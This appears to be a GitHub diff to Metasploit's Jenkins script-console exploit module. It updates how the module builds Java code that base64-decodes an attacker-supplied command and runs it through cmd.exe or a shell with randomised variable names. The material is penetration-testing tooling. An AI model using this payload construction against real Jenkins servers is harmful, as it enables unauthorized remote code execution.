rapid7 · space-r7 · Aug 31, 2022 · Jul 6, 2022 · Jul 6, 2022 · Aug 25, 2022
diff --git a/modules/exploits/multi/http/jenkins_script_console.rb b/modules/exploits/multi/http/jenkins_script_console.rb
@@ -108,12 +108,10 @@ def http_send_command(cmd, opts = {})
   end
 
   def java_craft_runtime_exec(cmd)
-    decoder = Rex::Text.rand_text_alpha(5, 8)
     decoded_bytes = Rex::Text.rand_text_alpha(5, 8)
     cmd_array = Rex::Text.rand_text_alpha(5, 8)
-    jcode =  "sun.misc.BASE64Decoder #{decoder} = new sun.misc.BASE64Decoder();\n"
-    jcode << "byte[] #{decoded_bytes} = #{decoder}.decodeBuffer(\"#{Rex::Text.encode_base64(cmd)}\");\n"
-
+    jcode = "byte[] #{decoded_bytes} = Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\");\n"
+
     jcode << "String [] #{cmd_array} = new String[3];\n"
     if target['Platform'] == 'win'
       jcode << "#{cmd_array}[0] = \"cmd.exe\";\n"